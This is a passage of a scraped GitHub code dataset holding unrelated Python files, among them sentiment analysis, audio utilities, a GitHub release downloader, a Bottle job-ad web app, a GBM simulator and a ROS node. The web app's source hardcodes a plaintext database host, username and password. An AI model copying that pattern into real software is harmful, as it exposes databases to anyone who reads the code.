struct.\n \n :param num: number to pack to a fixed point type.\n :return num: as a packed fixed point for use in serial communication. \n \"\"\"\n return pack_int(math.floor(num * 0x10000)) # Magic? No.\n\n # Unpack into word16\n (pos_low, pos_hi) = pack_int(pos_amount)\n (accel_low, accel_hi) = to_fixed_point(acceleration)\n (speed_low, speed_hi) = to_fixed_point(speed)\n # Return the program\n return assemble_program([\n CACC(accel_low, accel_hi),\n CSPD(speed_low, speed_hi),\n CPOS(pos_low, pos_hi),\n CSET(0xDFFF, 0x0000),\n CSET(0xBFC1, 0x8701),\n CSET(0xFFFF, 0x4000),\n UPD()#,\n # NOTMC(),\n # WAIT()\n ])\n\n","repo_name":"PUM-9/TreeD","sub_path":"technosoft-linear-drive/src/technosoftlineardrive/assemblyprogram.py","file_name":"assemblyprogram.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9229176081","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 10 11:37:11 2023\n\n@author: User\n\"\"\"\nimport pandas as pd\nfrom textblob import Blobber #pip install textblob\nfrom textblob_fr import PatternTagger, PatternAnalyzer #pip install textblob-fr\ntb = Blobber(pos_tagger=PatternTagger(), analyzer=PatternAnalyzer())\n\n\n\ndef note(nb):\n if nb > 0 : \n return \"Positif\"\n elif nb < 0 : \n return \"Négatif\"\n else:\n return \"Neutre\"\n\n\n\ndef analyse_sentiment(data):\n dictionnaire = {}\n for auteur in data[\"author\"].unique():\n dictionnaire[auteur] = []\n \n data.loc[max(data.index)+1] = [0,0,\"\",0,0,\"\",\"\",\"\"]\n parole = data[\"author\"][0]\n text = \"\"\n for i in data.index:\n if parole == data[\"author\"][i]:\n text += \" \"+data[\"text\"][i]\n else: \n analysis = note(tb(text).sentiment[0])\n dictionnaire[data[\"author\"][i-1]].append(analysis)\n parole = data[\"author\"][i]\n text = data[\"text\"][i]\n \n \n \n sentiment = {}\n sentiment[\"global\"] = [0,0,0]\n for auteur in dictionnaire.keys():\n sentiment[auteur] = [dictionnaire[auteur].count('Positif'),dictionnaire[auteur].count('Neutre'),dictionnaire[auteur].count('Négatif')]\n \n 
sentiment[\"global\"][0] += dictionnaire[auteur].count('Positif')\n sentiment[\"global\"][1] += dictionnaire[auteur].count('Neutre')\n sentiment[\"global\"][2] += dictionnaire[auteur].count('Négatif')\n \n return sentiment\n\n\n \n\n","repo_name":"TMayling/IR","sub_path":"Sentiment_Analysis_Signature.py","file_name":"Sentiment_Analysis_Signature.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73143685288","text":"# pylint: disable=E1101:no-member\r\n\"\"\"\r\nAudio utils.\r\n\"\"\"\r\nfrom typing import Optional\r\nimport torch\r\nfrom torch.nn.functional import pad\r\nfrom torchaudio.functional import resample\r\n\r\n\r\ndef convert_audio(\r\n audio: torch.Tensor,\r\n sample_rate: int,\r\n target_sample_rate: int,\r\n target_channels: int,\r\n target_duration: Optional[float] = None,\r\n normalize: bool = False,\r\n fadeout_duration: float = 0.1,\r\n) -> torch.Tensor:\r\n \"\"\"\r\n Converts an audio tensor to the desired sample rate, number of channels, and duration using various transformations.\r\n\r\n Args:\r\n audio (torch.Tensor): The input audio tensor of shape (n_sounds, n_channels, n_samples).\r\n sample_rate (int): The sample rate of the input audio tensor.\r\n target_sample_rate (int): The target sample rate to convert the input audio tensor to.\r\n target_channels (int): The target number of channels to convert the input audio tensor to.\r\n target_duration (float): The target duration of the output audio tensor in seconds.\r\n Note that the input audio tensor will be padded or truncated (with a fade out - see below)\r\n to the target length if necessary. Pass None to leave the input audio tensor unchanged. (Default: None)\r\n normalize (bool): Whether to normalize the input audio tensor. (Default: False)\r\n fadeout_duration (float): The duration of the fadeout in seconds. 
If not specified, defaults to 100ms.\r\n (Default: 0.1)\r\n\r\n Returns:\r\n torch.Tensor: The transformed audio tensor of the specified sample rate, number of channels, and duration.\r\n \"\"\"\r\n assert audio.shape[-2] in [1, 2], \"Audio must be mono or stereo.\"\r\n\r\n # convert to mono if required\r\n audio = (\r\n audio.mean(-2, keepdim=True)\r\n if (target_channels == 1) and (audio.shape[-2] == 2)\r\n else audio\r\n )\r\n\r\n # convert to stereo if required\r\n if (target_channels == 2) and (audio.shape[-2] == 1):\r\n audio = audio.expand(*audio.shape[:-2], target_channels, -1)\r\n\r\n # resample to target sample rate\r\n if sample_rate != target_sample_rate:\r\n audio = audio.clone() # might raise an error without\r\n audio = resample(audio, sample_rate, target_sample_rate)\r\n\r\n # truncate to target duration and apply fade out if required\r\n if target_duration is not None:\r\n target_num_samples = int(target_duration * target_sample_rate)\r\n\r\n if audio.shape[-1] > target_num_samples:\r\n fadeout_num_samples = int(fadeout_duration * target_sample_rate)\r\n fadeout = (\r\n torch.linspace(1, 0, fadeout_num_samples)\r\n if fadeout_num_samples > 0\r\n else 1.0\r\n )\r\n audio = audio[..., :target_num_samples]\r\n audio[..., -fadeout_num_samples:] *= fadeout\r\n\r\n # zero-pad to target duration if required\r\n elif audio.shape[-1] < target_num_samples:\r\n audio = pad(audio, (0, target_num_samples - audio.shape[-1]))\r\n\r\n # normalize if required\r\n audio = (\r\n (audio / audio.abs().amax((-2, -1), keepdim=True)) * 0.99\r\n if normalize\r\n else audio\r\n )\r\n\r\n return audio\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"utils/audio.py run successfully.\")\r\n","repo_name":"pcmbs/preset-embedding_audio-model-selection","sub_path":"src/utils/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9854431652","text":"import requests\nimport os\nfrom iidda_api import read_config\nimport aiohttp\nimport asyncio\nfrom iidda_api import get_release_list\nfrom aiohttp_client_cache import FileBackend\nfrom appdirs import *\n\n\ndef convert_to_raw(url):\n '''Converts github.com url to raw.githubusercontent.com url\n\n Args:\n url (str): link with base url \"github.com\" to a file stored on github\n\n Returns:\n str: equivalent url with \"raw.githubusercontent.com\" base url\n '''\n return url.replace(\"github.com\", \"raw.githubusercontent.com\").replace(\"/blob/\", \"/\")\n\n\nasync def get_pipeline_dependencies(dataset_name, version=\"latest\", version_tag=\"\"):\n '''Downloads all pipeline_dependencies of a dataset\n\n Args:\n dataset_name (str): name of the dataset\n version (str, int, optional): version of the dataset\n version_tag (str, optional): version prefix of dataset (e.g. \"v9-\" indicates version 9 of a particular dataset)\n\n Returns:\n list: list of tuples. 
Each tuple contains a file's name and content\n '''\n # Get access token\n ACCESS_TOKEN = read_config('access_token')\n # make cache directory\n cache_path = user_cache_dir(\"iidda-api-cache\", \"\")\n if not os.path.isdir(cache_path):\n os.makedirs(cache_path)\n # Cache configurations\n release_list_cache = FileBackend(\n cache_name=cache_path + \"/release_list\"\n )\n\n releases = asyncio.run(get_release_list(\n ACCESS_TOKEN, release_list_cache, clear_cache=False))\n\n # filter through and sort all releases of this name ascending by version\n release_list = filter(\n lambda release: release['name'] == dataset_name, releases)\n release_list = sorted(\n release_list, key=lambda release: int(release['body'][8:]))\n\n # check if dataset is contained in repo\n if not release_list:\n return \"This dataset does not exist in the releases\"\n\n if version == \"latest\":\n version = len(release_list)\n\n if int(version) > len(release_list):\n return f\"The supplied version is greater than the latest version. The latest version is {len(release_list)}\"\n\n release = release_list[int(version) - 1]\n\n headers = {\n 'Authorization': 'token ' + ACCESS_TOKEN,\n 'Accept': 'application/octet-stream'\n }\n\n for asset in release['assets']:\n if asset['name'] == dataset_name + \".json\":\n response = requests.get(asset['url'], stream=True, headers=headers)\n if response.ok:\n dataset_metadata = response.json()\n\n async def main():\n async with aiohttp.ClientSession(headers={'Authorization': 'token ' + ACCESS_TOKEN, 'Accept': 'application/vnd.github.v3.raw'}) as session:\n tasks = []\n for relatedIdentifier in dataset_metadata['relatedIdentifiers']:\n if relatedIdentifier['relatedIdentifierType'] == \"URL\":\n if isinstance(relatedIdentifier['relatedIdentifier'], list):\n for link in relatedIdentifier['relatedIdentifier']:\n url = convert_to_raw(link)\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n else:\n url = convert_to_raw(\n relatedIdentifier['relatedIdentifier'])\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n\n files = await asyncio.gather(*tasks)\n return files\n\n async def download_dependencies(url, session):\n if url == \"on mcmaster math server (file to large for github)\":\n file_name = file_name = version_tag + dataset_name + \"/\" + \\\n version_tag + dataset_name + \"_dependencies/\" + url + \".txt\"\n return (file_name, \"on mcmaster math server (file to large for github)\")\n else:\n file_name = version_tag + dataset_name + \"/\" + version_tag + \\\n dataset_name + \"_dependencies/\" + \\\n os.path.basename(url[34:])\n async with session.get(url) as response:\n file_content = await response.read()\n return (file_name, file_content)\n\n return asyncio.run(main())\n else:\n return \"Failure in getting assets from GitHub {}\\n{}\".format(response.status_code, response.text)\n","repo_name":"canmod/iidda-tools","sub_path":"python/iidda_api/get_pipeline_dependencies.py","file_name":"get_pipeline_dependencies.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4482114356","text":"# *-* coding:utf-8 *-*\n#!/usr/bin/python\n'''\n*******Creator*******\nSe varje funktion\n'''\nimport bottle\nfrom modules import log\nfrom modules import handleUsers\nfrom modules import addmod\nfrom bottle import route, get, post, run, template, error, static_file, request, redirect, abort, response, app\nfrom 
beaker.middleware import SessionMiddleware\nimport MySQLdb\n\ndb = None\ncursor = None\n\ndef call_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tglobal cursor\n\tdb = MySQLdb.connect(host=\"195.178.232.16\", port=3306, user=\"AC8240\", passwd=\"hejhej123\", db=\"AC8240\")\n\tcursor = db.cursor()\n\treturn cursor\n\ndef hang_up_on_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tdb = db.close()\n\n'''*********Routes*********'''\n\n@route('/')\ndef startPage():\n\t#Skriven av: Jari\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\tredirect('/login')\n\n\n'''*********Login*********'''\n\n@route('/login')\ndef login():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn template('login', pageTitle='Logga in')\n\n\n@route('/ajax', method=\"POST\")\ndef ajax_validation():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresult = log.ajax_validation(cursor)\n\thang_up_on_database()\n\tif result == False:\n\t\treturn 'error'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_login', method='POST')\ndef do_login():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresponse = log.login(cursor)\n\thang_up_on_database()\n\tif response == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error('Tyvärr - användaren finns inte!')\n\n\n@route('/log_out')\ndef log_out():\n\t#Skriven av: Jacob\n\tlog.log_out()\n\tredirect('/login')\n\n@route('/admin')\ndef admin():\n\t#Skriven av: Jacob & Jari\n\t#Mindre uppdateringar: Sofia\n\tlog.validate_autho() #kontrollerar om användaren är inloggad\n\tcursor = call_database()\n\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\n\tif user_level == 1:\n\t\tads_untreated = []\n\t\tads_ongoing = []\n\t\tads_finished = []\n\n\t\tads_to_apply_on=addmod.available_ads(userid, cursor)\n\t\tall_ads=addmod.sort_by_status(userid, cursor)\n\t\tfor each in all_ads:\n\t\t\tif each[7]=='Obehandlad':\n\t\t\t\tads_untreated.append(each)\n\t\t\telif each[7]=='Vald':\n\t\t\t\tads_ongoing.append(each)\n\t\t\telif each[7]=='Avslutad':\n\t\t\t\tads_finished.append(each)\n\t\tdenied_missions = addmod.get_denied_missions(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('student_start',finished_ads=ads_finished, avail_ads=ads_to_apply_on, accepted_on=ads_ongoing, pending_ad=ads_untreated, user_id=userid, user=username, level=\"student\", pageTitle = 'Start', denied_missions=denied_missions)\n\n\telse:\n\t\temployer_ads = addmod.get_my_ads(userid, cursor)\n\t\tstudents = addmod.students_that_applied(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('employer_start', user=username, user_id=userid, level=\"arbetsgivare\", annons=employer_ads, pageTitle = 'Start', students_application = students)\n\n@route('/about_us')\ndef about_us_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('about_us', pageTitle = 'Om Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 
2)\n\t\thang_up_on_database()\n\t\treturn template('about_us', pageTitle = 'Om Questway', user=username, user_autho=user_level, user_id=userid)\n\n@route('/help')\ndef help_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user = username, user_autho=user_level, user_id = userid)\n\n'''********Create-user********'''\n@route('/create')\ndef create_user():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_user', pageTitle='Student | Uppdragsgivare')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_student')\ndef create_student():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_student', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_employer')\ndef create_employer():\n\t#Skriven av Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_employer', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/ajax_create_user', method=\"POST\")\ndef ajax_create_validation():\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tresult = handleUsers.ajax_new_user_validation(cursor)\n\thang_up_on_database()\n\tif result['result'] == False and result['error'] == 'Bad input':\n\t\treturn 'Bad input'\n\telif result['result'] == False and result['error'] == 'User exists':\n\t\treturn 'User exists'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_create_user/', method = 'POST')\ndef do_create_user(user):\n\t#Skriven av Jacob\n\tglobal db\n\tif log.is_user_logged_in()==False:\n\t\tcursor = call_database()\n\t\tif user == \"student\":\n\t\t\tresponse = handleUsers.create_student(cursor)\n\t\telif user == \"employer\":\n\t\t\tresponse = handleUsers.create_employer(cursor)\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(\"Något har blivit fel!\")\n\t\tdb.commit()\n\t\tif response['result'] == True:\n\t\t\tlog.log_in_new_user(response['email'], response['password'], cursor)\n\t\t\thang_up_on_database()\n\t\t\tredirect('/admin')\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(response['error'])\n\telse:\n\t\tredirect('/admin')\n\n@route('/profiles/')\ndef profiles(user):\n\t#Skriven av Jacob\n\ttry:\n\t\tuser = int(user)\n\texcept:\n\t\treturn return_error('Användaren finns inte!')\n\n\tcursor = call_database()\n\tuser_profile_data = handleUsers.show_student_profile(user, cursor)\n\tis_user_logged_in = log.is_user_logged_in()\n\n\tgrading_ads = addmod.grading_ads(user, cursor)\n\tgrading_skills = addmod.get_ad_skills(user, cursor)\n\tusername = \"\"\n\tthis_user = False\n\tif is_user_logged_in == True:\n\t\tuser_levle = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\tlogged_in_id = log.get_user_id_logged_in()\n\t\tif logged_in_id == user:\n\t\t\tthis_user = True\n\telse:\n\t\tuser_levle = 0\n\n\thang_up_on_database()\n\n\tif user_profile_data['exists'] == True:\n\t\teducation_info = user_profile_data['education_info']\n\t\tstudent_info = user_profile_data['student_info']\n\t\tstudent_name = 
student_info[0] + ' ' + student_info[1]\n\t\treturn template('user_profile', user = username, user_autho = user_levle, user_id = user, student= student_info, education = education_info, pageTitle = student_name, grading = grading_ads, grading_skills = grading_skills, this_user=this_user )\n\n\telse:\n\t\treturn return_error('Användaren finns inte!')\n\n@route('/edit_mission//', method=\"POST\")\ndef edit_mission(user,ad_id):\n\t#Skriven av Jacob\n\tglobal db\n\ttry:\n\t\tint(user)\n\t\tint(ad_id)\n\texcept:\n\t\treturn return_error('Något har blciti fel!')\n\tlog.validate_autho()\n\tif int(log.get_user_id_logged_in()) == int(user):\n\t\tcursor = call_database()\n\t\taddmod.edit_mission(ad_id, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/profiles/' + str(user))\n\treturn return_error('Ej behörighet!')\n\n\n'''********Ad-management********'''\n\n@route('/do_new_ad')\ndef do_new_ad():\n\t#Skriven av Jari\n\t'''Returns a view where the logged-in employer can fill in information for a new ad'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tusername=log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('adsform.tpl',user=username, pageTitle = 'Annonser')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/make_ad', method=\"POST\")\ndef ad_done():\n\t#Skriven av Jari\n\t'''Creates a new ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.do_ad(cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n\n@route('/make_ad')\ndef no_get():\n\t#Skriven av Jari\n\tredirect('/admin')\n\n\n'''*****Delete ad*****'''\n\n@route('/del_ad/', method=\"POST\")\ndef del_ad(which_ad):\n\t#Skriven av Jari\n\t'''Deletes a specifik ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_logged_in=log.get_user_id_logged_in()\n\t\taddmod.erase_ad(which_ad, user_logged_in, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n'''****Students can apply on an ad****'''\n\n@route('/apply_on_ad/', method=\"POST\")\ndef apply_for_mission(which_ad):\n\t#Skriven av Jari\n\t'''Onclick on template - student applies on a specifik ad'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.applying_for_mission(which_ad, cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n'''****All the ads and their applications listed***'''\n\n@route('/allMissions')\ndef list_applied_students():\n\t#Skriven av Jari\n\t'''lists all ads with their specific application status'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_id=log.get_user_id_logged_in()\n\t\tusername=log.get_user_name(cursor)\n\t\trelevant_adds=addmod.get_my_ads(user_id, cursor)\n\t\tstudents_application = addmod.students_that_applied(user_id, cursor)\n\t\tfeedback_info = addmod.get_given_feedback_for_employers(user_id, cursor)\n\t\thang_up_on_database()\n\t\treturn template('adds.tpl',user_id=user_id, user=username, adds=relevant_adds, students=students_application, pageTitle='Alla uppdrag', feedback = 
feedback_info)\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/select_student//')\ndef accepted_ones(ad, appliersID):\n\t#Skriven av Jari\n\tglobal db\n\tcursor = call_database()\n\tif log.get_user_level(cursor) == 2:\n\t\taddmod.who_got_accepted(ad, appliersID, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect ('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/ad_done/', method=\"POST\")\ndef ad_done(ad):\n\t#Skriven av Jari\n\tglobal db\n\ttry:\n\t\tint(ad)\n\texcept:\n\t\treturn return_error('Nu har något blivit fel!')\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tresponse = addmod.move_ad_to_complete(int(ad), cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tif response['response'] == False:\n\t\t\treturn return_error(response['error'])\n\t\telse:\n\t\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/give_feedback/')\ndef give_feedback(ad_nr):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2 and log.get_user_id_logged_in() == addmod.get_ad_creator_id(cursor, int(ad_nr)):\n\t\tusername = log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('feedback', adnr=ad_nr, pageTitle = 'Ge feedback', user=username )\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\ndef return_error(error_message):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tif log.is_user_logged_in == True:\n\t\tuserid = log.get_user_id_logged_in()\n\t\tuser_level = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\treturn template('error_message', pageTitle = error_message, user = username, user_autho = user_level, user_id = user, error_message=error_message)\n\telse:\n\t\treturn template('error_message', pageTitle = error_message, user_autho = 3, error_message=error_message)\n\n\n'''********Övriga Routes********'''\n\n@error(404)\ndef error404(error):\n return template('pagenotfound', pageTitle = 'Fel!' 
)\n\n@route('/static/')\ndef server_static(filename):\n return static_file(filename, root=\"static\")\n\n\napp = SessionMiddleware(app(), log.session_opts)\nrun(app=app)\n","repo_name":"j-j-hoff/Questway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73686857448","text":"maior = 0\nmenor = 0\nnumeros = []\nfor x in range(0, 5):\n numeros.append(int(input('Digite um número inteiro: ')))\n if x == 0:\n maior = menor = numeros[x]\n elif numeros[x] > maior:\n maior = numeros[x]\n elif numeros[x] < maior:\n menor = numeros[x]\nprint(f'A lista de números digitadas foi {numeros}')\nprint(f'O maior número foi {maior} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == maior:\n print(f'{p}...', end='')\nprint(f'\\nO menor número foi {menor} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == menor:\n print(f'{p}...', end='')","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex078b.py","file_name":"ex078b.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"340366978","text":"config, instructions = [part.split(\"\\n\") for part in open(\"input.txt\", \"r\").read().split(\"\\n\\n\")]\nstacks = [[] for i in range(max([int(s) for s in config[-1].split() if s.isdigit()]))]\nfor line in config[:-1]:\n for i, box in enumerate(line[1::4]):\n if box != ' ': stacks[i] += box\n \nstack1, stack2 = stacks[:], stacks[:]\nfor line in instructions:\n n, src, dest = [int(s) for s in line.split() if s.isdigit()]\n stack1[src-1], stack1[dest-1] = stack1[src-1][n:], stack1[src-1][:n][::-1] + stack1[dest-1]\n stack2[src-1], stack2[dest-1] = stack2[src-1][n:], stack2[src-1][:n] + stack2[dest-1]\n\nprint('Task 1: ', ''.join(s[0] for s in stack1 if s))\nprint('Task 2: ', ''.join(s[0] for s in stack2 if s))","repo_name":"rklimpel/Advent-of-Code-2022","sub_path":"05/fancy.py","file_name":"fancy.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23589889074","text":"import numpy as np\nimport sys\nimport numba\n\ndef simulate_gbm(n, s, r, div_yield, t, t_terminal, dt, sigma, method = \"euler\", seed = None):\n \"\"\"\n Simulate a geometric brownian motion path\n :param n: Number of simulations\n :param s: Stock price at time t\n :param r: Risk free interest rate\n :param div_yield: Continuous dividend yield\n :param t_terminal: Terminal time\n :param t: Starting time\n :param dt: Discretization time step size\n :param sigma: Volatility\n :param method: Simulation method, either \"euler\" or \"milstein\"\n :param seed: Random seed used\n :return: An array containing the n simulations as rows and the time steps as columns\n \"\"\"\n\n # Set the seed\n if seed is not None:\n np.random.seed(seed)\n\n # Total time steps\n t_total = int((t_terminal - t) / dt)\n\n # Random normal generation\n z = np.random.randn(n, t_total)\n\n # Fill in the simulation matrix\n s_t = dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method)\n\n return s_t\n\n\ndef dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method):\n '''\n Dispatch the simulation to the appropriate algorithm\n :return: s_t filled with the simulation values\n '''\n\n if method == \"euler\":\n\n s_t = simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z)\n\n elif method 
== \"milstein\":\n\n s_t = simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z)\n\n else:\n\n sys.exit(\"Method not supported.\")\n\n return s_t\n\n\ndef simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Euler discretization\n :return: s_t filled with the simulation values by Euler\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z,\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t\n\n\ndef simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Milstein discretization\n :return: s_t filled with the simulation values by Milstein\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z \\\n + .5 * sigma * sigma * ((np.sqrt(dt) * z) ** 2 - dt),\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t","repo_name":"DavisVaughan/uncc-math-6204","sub_path":"assignments/hw-03 efficient/gbm_simulator.py","file_name":"gbm_simulator.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18564363775","text":"#!/usr/bin/env python\n\nimport rospy\nfrom rospy import Time, Duration\nfrom geometry_msgs.msg import Twist, Pose\nfrom nav_msgs.msg import Odometry\nimport math\nfrom datetime import datetime\nimport time\n\n\ndef zad1():\n VEL_LIN = 0.08*2.4\n VEL_ANG = 0.09*2.4\n\n TURN_RIGHT = 0\n SIDE_LENGHT = 1.0\n\n pub = rospy.Publisher('key_vel', Twist, queue_size=10)\n sub = rospy.Subscriber(\"/mobile_base_controller/odom\", Odometry, callback)\n rospy.init_node('zad1', anonymous=True)\n rate = rospy.Rate(50) # 10hz\n\n vel = Twist()\n\n i = 0\n while not rospy.is_shutdown():\n i+=1\n global time_now\n if i>2:\n \n now = rospy.Time.now()\n time_now = now.secs + float(now.nsecs)/1000000000\n lin, ang = go_square(SIDE_LENGHT, TURN_RIGHT, VEL_LIN, VEL_ANG)\n vel.linear.x = lin\n vel.angular.z = ang\n\n if i == 2:\n global start_time\n now = rospy.Time.now()\n start_time = now.secs + float(now.nsecs)/1000000000\n \n pub.publish(vel)\n rate.sleep()\n\n\ndef callback(data):\n global pose\n pose = Pose()\n pose = data.pose.pose\n\n\ndef calc_time_lin(a, vel_lin):\n return a/vel_lin\n\n\ndef calc_time_ang(vel_ang):\n return (math.pi/2)/vel_ang\n\n\ndef go_square(side_lenght, turn_right, vel_lin, vel_ang):\n global start_time\n\n TIME_LIN = calc_time_lin(side_lenght, vel_lin)\n TIME_ANG = calc_time_ang(vel_ang)\n\n duration = time_now - start_time\n print(duration)\n if duration < TIME_LIN:\n lin = vel_lin\n ang = 0\n elif duration >= TIME_LIN and duration <= TIME_LIN + TIME_ANG:\n lin = 0.0\n if turn_right:\n ang = -vel_ang\n else:\n ang = vel_ang\n else:\n start_time = time_now\n lin = 0\n ang = 0\n\n\n return lin, ang\n\n\nif __name__ == '__main__':\n try:\n zad1()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"kamil-szczepanik/Control-and-Simulation-of-Robots","sub_path":"mobile/scripts/lab1/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20561624329","text":"import os\nfrom abc import ABC, abstractmethod\nimport json\nimport argparse\nimport re\nfrom collections import defaultdict\n\n\nimport requests\nimport logging\nfrom html import unescape as htmlue\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom 
